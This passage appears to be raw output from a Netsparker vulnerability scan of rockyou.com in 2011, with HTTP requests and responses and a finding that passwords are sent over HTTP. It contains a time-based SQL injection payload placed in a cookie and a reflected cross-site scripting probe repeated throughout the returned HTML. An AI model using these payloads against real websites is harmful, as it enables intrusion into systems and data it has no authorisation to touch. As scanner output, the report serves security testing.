Cookie: PHPSESSID=pj7gvi6m71cds8ga7nfrd4d6n1; lang=en; lastlogin=1303165815; ctid=3; sns_type=rockyou.com; istack=158777336%7Cwww202.rockyou.com%7C%7C158777337%7Cwww202.rockyou.com%7C%7C158777339%7Cwww202.rockyou.com%7C%7C158777341%7Cwww202.rockyou.com%7C%7C158777342%7Cwww202.rockyou.com%7C%7C158777345%7Cwww202.rockyou.com%7C%7C158777346%7Cwww202.rockyou.com%7C%7C158777348%7Cwww202.rockyou.com%7C%7C158777349%7Cwww202.rockyou.com%7C%7C158777351%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://www.rockyou.com/slideshow-viewplaylist.php?instanceid=117242930
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=pj7gvi6m71cds8ga7nfrd4d6n1; lang=en; lastlogin=1303165815; ctid=3; sns_type=rockyou.com; istack=158777336%7Cwww202.rockyou.com%7C%7C158777337%7Cwww202.rockyou.com%7C%7C158777339%7Cwww202.rockyou.com%7C%7C158777341%7Cwww202.rockyou.com%7C%7C158777342%7Cwww202.rockyou.com%7C%7C158777345%7Cwww202.rockyou.com%7C%7C158777346%7Cwww202.rockyou.com%7C%7C158777348%7Cwww202.rockyou.com%7C%7C158777349%7Cwww202.rockyou.com%7C%7C158777351%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:30:16 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:30:15 GMT; path=/; domain=.rockyou.com,lang=en; expires=Thu, 28-Apr-2011 22:30:16 GMT; path=/; domain=.rockyou.com,lastlogin=1303165816; expires=Wed, 27-Jul-2011 22:30:16 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:30:16 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=29822 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 4697
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="js/embeds.js?ver=4" type="text/javascript"></script><script src="js/music-embeds.js?ver=1" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
</HEAD>
<BODY class=""
style="background-image: url(/images/menu-bg.gif); background-repeat: repeat-x;"
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initPage();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="display:block;width:840px;height:68px;border:0px;position:relative;">
<a href="/index.php"><img src="/images/logo-menutop-rockyou.gif" alt=""></a>
<table cellpadding="1" cellspacing="0" style="position:absolute;top:0px;left:107px;"><tr>
<td style="font-size:15px"><a class="mainmenu" href="/choose_widget.php">Create</a> | </td>
<td style="font-size:15px"><a class="mainmenu" href="/my_stuff.php">My Stuff</a> | </td>
<td style="font-size:15px"><a class="mainmenu" href="/featuredartists.php">Browse</a></td>
</tr></table>
<img src="/images/index_tab.gif" style="position:absolute;top:0px;left:620px">
<div style="position:absolute;top:5px;left:630px;font-size:11px;font-family:arial;width:200px;text-align:center;">
<a href="http://www.rockyou.com/login/" style="color: white;">login / register</a> </div>
</div>
<div style="position:absolute;top:24;left:628;">
<form method="get" action="/search_main.php">
<table class="search" id="search_box"><tr><td>
<input type="text" name="s_tsearch" size=17 style="border:2px solid #6388c2"/></td>
<td><input type="submit" value="search" />
</td></tr></table> <input type="hidden" value="1" name="p" /></form>
</div>
<script>
var thisinstanceid = '117242930�'"--></style></script><script>netsparker(0x001F33)</script>';
membed = new musicEmbed(-1);
var curSong = -1;
function initPage()
{
//refreshMusic(-1);
embed = new appEmbed(thisinstanceid);
embed.noSound=true;
embed.insertEmbed("viewslideshow");
embed.setPixelSize(300,200);
}
function refreshMusic(id)
{
membed.insertEmbed('music-player');
}
function previewSong(url,cnt)
{
if (membed.songUrl!=url)
{
membed.songUrl=url;
document.getElementById('playicon-'+cnt).src='/images/icon-stopbig.gif';
if (curSong >= 0) document.getElementById('playicon-'+curSong).src='/images/icon-playbig.gif';
}
else
{
if (membed.songUrl==url)
{
document.getElementById('playicon-'+cnt).src='/images/icon-playbig.gif';
}
membed.songUrl="";
curSong=-1;
}
membed.stop = false;
curSong = cnt;
refreshMusic(-1);
}
function loadingSong()
{
}
function CopyToClipboard()
{
var e = document.getElementById("slidecontent");
e.focus();
e.select();
document.selection.createRange().execCommand("Copy");
}
</script>
<table><tr><td valign="top" >
<div style="position:relative">
<div id="viewslideshow" style="margin-left: 10px; border:1px solid #cccccc;"></div>
</div>
<div style="float:right;display:inline"><a href="show_my_gallery.php?instanceid=117242930�'"--></style></script><script>netsparker(0x001F33)</script>">View Full Show</a></div>
<div style="clear:both"></div>
<div style="background-color:#e9e8e8;border:solid #aaa 1px;width:340px;margin-top:10px;margin-left:11px;padding-top:3px" align="center">
<strong>Embed Code</strong><br />
<textarea id="slidecontent" wrap="hard" onClick="this.focus(); this.select();" style="margin:2px auto 5px auto;border: solid 1px #aaa;background:#fff;font-size:12px;font-family:Arial, Helvetica, sans-serif; height:50; color:#666; width: 300px; overflow:hidden;"><embed src="http://apps.rockyou.com/rockyou.swf?instanceid=117242930�'"--></style></script><script>netsparker(0x001F33)</script>" quality="high" wmode="transparent" width="426" height="320" flashvars="appWidth=325&appHeight=244" name="slideshowpreview" align="middle" allowScriptAccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"/><br><img src="http://apps.rockyou.com/dot.gif"><a target="_BLANK" href="http://www.rockyou.com?type=slideshow&refid=117242930�'"--></style></script><script>netsparker(0x001F33)</script>"><img title="RockYou slideshow" src="http://apps.rockyou.com/images/logo-mini.gif" border="0"></a> <a target="_BLANK" href="http://www.rockyou.com/slideshow-create.php?source=cyo&refid=117242930�'"--></style></script><script>netsparker(0x001F33)</script>">Create Your Own</a><a style="padding-right:0px;" target="_BLANK" href=" http://www.rockyou.com/slideshow-viewplaylist.php?instanceid=117242930�'"--></style></script><script>netsparker(0x001F33)</script>"><img style="border:0px;" src="http://apps.rockyou.com/images/tail_playlist.gif "></a></textarea>
<br />
<a href="javascript: CopyToClipboard();"><img src="images/rockyou_music-copybutton.jpg" style="margin-bottom:7px" /></a>
<!--br><center><a onclick="urchinTracker ('/links/viewplaylist/slideshowcreate')" href="/slideshow-create.php?source=svp"><img src="/images/button-createslideshow-big.gif"></a></center1-->
</td><td valign="top">
<div style="font-weight: bold; font-size:24px;font-family: arial;">
<img src='images/rockyou_music-banner.jpg'>
<p style="margin:10px 0px 0px 0px;">Song Playlist</div>
<table width='450px'><tr style='background-color:#e9e8e8;'><td>1</td><td style='width: 80px; height:80px;'><div style='position:relative'><a href='javascript:previewSong("http://apps.rockyou.com/music/0/0/4/492.mp3",1);'><img height='80' src='http://apps.rockyou.com/images/spacer.gif'><img id='playicon-1' style='position:absolute;left:20px;top:20px;' src='/images/icon-playbig.gif'></a></div></td><td><b style='font-size: 18px;'>Chicken Fried</b><br>Zac Brown Band<br /><br /><a onclick='urchinTracker("/links/viewplaylist/492");' href='/music/music_slideshow_create.php?songid=492'>Get This Song in a Slideshow</a></td></tr></table><div style='text-align:right;margin-top:5px;'>
<img src="/images/logos/snocap.png" style="border:1px solid #CCCCCC">
<img src="/images/bebo-bands-logo.jpg" style="border:1px solid #CCCCCC">
<img src="/images/logo-nettwerk.jpg" style="border:1px solid #CCCCCC">
<img src="/images/logo-pumpaudio.jpg" style="border:1px solid #CCCCCC">
</div>
</td></tr></table><div id='music-player'></div>
<div style='position: absolute; left: 850px; top: 0px; width: 160px;'>
</div>
<style>
.footmenublk:link {font-family:Arial;color:#f26522;font-size: 10px;font-weight:bold;text-decoration:underline;}
.footmenublk:visited {font-family:Arial;color:#f26522;font-size: 10px;font-weight:bold;text-decoration:underline;}
.footmenublk:active {font-family:Arial;color:#f26522;font-size: 10px;font-weight:bold;text-decoration:underline;}
.footmenublk:hover {font-family:Arial;color:#f26522;font-size: 10px;font-weight:bold;text-decoration:underline;}
</style>
<br><br>
<div class="tp"><span style="color:#CCCCCC">
Copyright © 2007 RockYou | <a target="_BLANK" href="/help" class="footmenublk">FAQ / Help</a> | <a target="_BLANK" href="/privacypolicy.php" class="footmenublk">Privacy</a> | <a href="/tos.php" target=_blank class="footmenublk">Terms of Use</a> | <a href="/corp/facebook/ad.php" target="_blank" class="footmenublk">Facebook Advertisers</a> | <a href="/corp/facebook/dev.php" target="_blank" class="footmenublk">Facebook Developers</a> | <a href="/corp/about.php" target=_blank class="footmenublk">About Us</a></span></div>
<div class="tp">
| <a href="?lang=en&instanceid=117242930�'"--></style></script><script>netsparker(0x001F33)</script>" class="footmenublk">English</a> | <a href="?lang=zh&instanceid=117242930�'"--></style></script><script>netsparker(0x001F33)</script>" class="footmenublk">中文</a> | <a href="?lang=es&instanceid=117242930�'"--></style></script><script>netsparker(0x001F33)</script>" class="footmenublk">Español | <a href="?lang=pt&instanceid=117242930�'"--></style></script><script>netsparker(0x001F33)</script>" class="footmenublk">Port..
Date: Mon, 18 Apr 2011 22:30:16 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:30:15 GMT; path=/; domain=.rockyou.com,lang=en; expires=Thu, 28-Apr-2011 22:30:16 GMT; path=/; domain=.rockyou.com,lastlogin=1303165816; expires=Wed, 27-Jul-2011 22:30:16 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:30:16 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=29822 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 4697
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="js/embeds.js?ver=4" type="text/javascript"></script><script src="js/music-embeds.js?ver=1" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
</HEAD>
<BODY class=""
style="background-image: url(/images/menu-bg.gif); background-repeat: repeat-x;"
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initPage();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="display:block;width:840px;height:68px;border:0px;position:relative;">
<a href="/index.php"><img src="/images/logo-menutop-rockyou.gif" alt=""></a>
<table cellpadding="1" cellspacing="0" style="position:absolute;top:0px;left:107px;"><tr>
<td style="font-size:15px"><a class="mainmenu" href="/choose_widget.php">Create</a> | </td>
<td style="font-size:15px"><a class="mainmenu" href="/my_stuff.php">My Stuff</a> | </td>
<td style="font-size:15px"><a class="mainmenu" href="/featuredartists.php">Browse</a></td>
</tr></table>
<img src="/images/index_tab.gif" style="position:absolute;top:0px;left:620px">
<div style="position:absolute;top:5px;left:630px;font-size:11px;font-family:arial;width:200px;text-align:center;">
<a href="http://www.rockyou.com/login/" style="color: white;">login / register</a> </div>
</div>
<div style="position:absolute;top:24;left:628;">
<form method="get" action="/search_main.php">
<table class="search" id="search_box"><tr><td>
<input type="text" name="s_tsearch" size=17 style="border:2px solid #6388c2"/></td>
<td><input type="submit" value="search" />
</td></tr></table> <input type="hidden" value="1" name="p" /></form>
</div>
<script>
var thisinstanceid = '117242930�'"--></style></script><script>netsparker(0x001F33)</script>';
membed = new musicEmbed(-1);
var curSong = -1;
function initPage()
{
//refreshMusic(-1);
embed = new appEmbed(thisinstanceid);
embed.noSound=true;
embed.insertEmbed("viewslideshow");
embed.setPixelSize(300,200);
}
function refreshMusic(id)
{
membed.insertEmbed('music-player');
}
function previewSong(url,cnt)
{
if (membed.songUrl!=url)
{
membed.songUrl=url;
document.getElementById('playicon-'+cnt).src='/images/icon-stopbig.gif';
if (curSong >= 0) document.getElementById('playicon-'+curSong).src='/images/icon-playbig.gif';
}
else
{
if (membed.songUrl==url)
{
document.getElementById('playicon-'+cnt).src='/images/icon-playbig.gif';
}
membed.songUrl="";
curSong=-1;
}
membed.stop = false;
curSong = cnt;
refreshMusic(-1);
}
function loadingSong()
{
}
function CopyToClipboard()
{
var e = document.getElementById("slidecontent");
e.focus();
e.select();
document.selection.createRange().execCommand("Copy");
}
</script>
<table><tr><td valign="top" >
<div style="position:relative">
<div id="viewslideshow" style="margin-left: 10px; border:1px solid #cccccc;"></div>
</div>
<div style="float:right;display:inline"><a href="show_my_gallery.php?instanceid=117242930�'"--></style></script><script>netsparker(0x001F33)</script>">View Full Show</a></div>
<div style="clear:both"></div>
<div style="background-color:#e9e8e8;border:solid #aaa 1px;width:340px;margin-top:10px;margin-left:11px;padding-top:3px" align="center">
<strong>Embed Code</strong><br />
<textarea id="slidecontent" wrap="hard" onClick="this.focus(); this.select();" style="margin:2px auto 5px auto;border: solid 1px #aaa;background:#fff;font-size:12px;font-family:Arial, Helvetica, sans-serif; height:50; color:#666; width: 300px; overflow:hidden;"><embed src="http://apps.rockyou.com/rockyou.swf?instanceid=117242930�'"--></style></script><script>netsparker(0x001F33)</script>" quality="high" wmode="transparent" width="426" height="320" flashvars="appWidth=325&appHeight=244" name="slideshowpreview" align="middle" allowScriptAccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"/><br><img src="http://apps.rockyou.com/dot.gif"><a target="_BLANK" href="http://www.rockyou.com?type=slideshow&refid=117242930�'"--></style></script><script>netsparker(0x001F33)</script>"><img title="RockYou slideshow" src="http://apps.rockyou.com/images/logo-mini.gif" border="0"></a> <a target="_BLANK" href="http://www.rockyou.com/slideshow-create.php?source=cyo&refid=117242930�'"--></style></script><script>netsparker(0x001F33)</script>">Create Your Own</a><a style="padding-right:0px;" target="_BLANK" href=" http://www.rockyou.com/slideshow-viewplaylist.php?instanceid=117242930�'"--></style></script><script>netsparker(0x001F33)</script>"><img style="border:0px;" src="http://apps.rockyou.com/images/tail_playlist.gif "></a></textarea>
<br />
<a href="javascript: CopyToClipboard();"><img src="images/rockyou_music-copybutton.jpg" style="margin-bottom:7px" /></a>
<!--br><center><a onclick="urchinTracker ('/links/viewplaylist/slideshowcreate')" href="/slideshow-create.php?source=svp"><img src="/images/button-createslideshow-big.gif"></a></center1-->
</td><td valign="top">
<div style="font-weight: bold; font-size:24px;font-family: arial;">
<img src='images/rockyou_music-banner.jpg'>
<p style="margin:10px 0px 0px 0px;">Song Playlist</div>
<table width='450px'><tr style='background-color:#e9e8e8;'><td>1</td><td style='width: 80px; height:80px;'><div style='position:relative'><a href='javascript:previewSong("http://apps.rockyou.com/music/0/0/4/492.mp3",1);'><img height='80' src='http://apps.rockyou.com/images/spacer.gif'><img id='playicon-1' style='position:absolute;left:20px;top:20px;' src='/images/icon-playbig.gif'></a></div></td><td><b style='font-size: 18px;'>Chicken Fried</b><br>Zac Brown Band<br /><br /><a onclick='urchinTracker("/links/viewplaylist/492");' href='/music/music_slideshow_create.php?songid=492'>Get This Song in a Slideshow</a></td></tr></table><div style='text-align:right;margin-top:5px;'>
<img src="/images/logos/snocap.png" style="border:1px solid #CCCCCC">
<img src="/images/bebo-bands-logo.jpg" style="border:1px solid #CCCCCC">
<img src="/images/logo-nettwerk.jpg" style="border:1px solid #CCCCCC">
<img src="/images/logo-pumpaudio.jpg" style="border:1px solid #CCCCCC">
</div>
</td></tr></table><div id='music-player'></div>
<div style='position: absolute; left: 850px; top: 0px; width: 160px;'>
</div>
<style>
.footmenublk:link {font-family:Arial;color:#f26522;font-size: 10px;font-weight:bold;text-decoration:underline;}
.footmenublk:visited {font-family:Arial;color:#f26522;font-size: 10px;font-weight:bold;text-decoration:underline;}
.footmenublk:active {font-family:Arial;color:#f26522;font-size: 10px;font-weight:bold;text-decoration:underline;}
.footmenublk:hover {font-family:Arial;color:#f26522;font-size: 10px;font-weight:bold;text-decoration:underline;}
</style>
<br><br>
<div class="tp"><span style="color:#CCCCCC">
Copyright © 2007 RockYou | <a target="_BLANK" href="/help" class="footmenublk">FAQ / Help</a> | <a target="_BLANK" href="/privacypolicy.php" class="footmenublk">Privacy</a> | <a href="/tos.php" target=_blank class="footmenublk">Terms of Use</a> | <a href="/corp/facebook/ad.php" target="_blank" class="footmenublk">Facebook Advertisers</a> | <a href="/corp/facebook/dev.php" target="_blank" class="footmenublk">Facebook Developers</a> | <a href="/corp/about.php" target=_blank class="footmenublk">About Us</a></span></div>
<div class="tp">
| <a href="?lang=en&instanceid=117242930�'"--></style></script><script>netsparker(0x001F33)</script>" class="footmenublk">English</a> | <a href="?lang=zh&instanceid=117242930�'"--></style></script><script>netsparker(0x001F33)</script>" class="footmenublk">中文</a> | <a href="?lang=es&instanceid=117242930�'"--></style></script><script>netsparker(0x001F33)</script>" class="footmenublk">Español | <a href="?lang=pt&instanceid=117242930�'"--></style></script><script>netsparker(0x001F33)</script>" class="footmenublk">Port..
Password Transmitted Over HTTP
Password Transmitted Over HTTP
1
TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that password data is sent over HTTP.
Impact
If an attacker can intercept network traffic he/she can steal users credentials.
Actions to Take
- See the remedy for solution.
- Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.
Remedy
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
|
- /login.php
/login.php CONFIRMED |
Form target action
Request
GET /login.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 21:53:52 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 21:53:51 GMT; path=/; domain=.rockyou.com,lang=en; expires=Thu, 28-Apr-2011 21:53:52 GMT; path=/; domain=.rockyou.com,lastlogin=1303163632; expires=Wed, 27-Jul-2011 21:53:52 GMT; path=/; domain=.rockyou.com,sns_type=deleted; expires=Sun, 18-Apr-2010 21:53:51 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=11872 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 8995
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
